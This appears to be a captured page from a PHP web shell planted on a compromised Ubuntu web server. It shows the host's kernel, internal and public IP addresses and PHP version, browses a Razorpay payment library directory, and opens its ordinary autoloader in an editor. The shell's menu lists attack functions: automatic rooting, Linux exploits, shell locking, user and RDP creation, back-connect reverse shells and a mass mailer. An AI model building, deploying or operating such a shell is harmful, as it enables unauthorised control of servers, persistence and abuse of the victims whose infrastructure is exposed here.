Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.115.45
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pget /
razorpay /
razorpay-php /
[ HOME SHELL ]
Name
Size
Permission
Action
libs
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
README.md
2.41
KB
-rwxr-xr-x
Razorpay.php
1.03
KB
-rwxr-xr-x
composer.json
1.05
KB
-rwxr-xr-x
composer.lock
3.84
KB
-rwxr-xr-x
doc.md
649
B
-rwxr-xr-x
version.txt
7
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Razorpay.php
<?php // Include Requests require_once __DIR__.'/libs/Requests-1.6.1/library/Requests.php'; // Register requests autoloader Requests::register_autoloader(); spl_autoload_register(function ($class) { // project-specific namespace prefix $prefix = 'Razorpay\Api'; // base directory for the namespace prefix $base_dir = __DIR__ . '/src/'; // does the class use the namespace prefix? $len = strlen($prefix); if (strncmp($prefix, $class, $len) !== 0) { // no, move to the next registered autoloader return; } // get the relative class name $relative_class = substr($class, $len); // // replace the namespace prefix with the base directory, // replace namespace separators with directory separators // in the relative class name, append with .php // $file = $base_dir . str_replace('\\', '/', $relative_class) . '.php'; // if the file exists, require it if (file_exists($file)) { require $file; } });
Close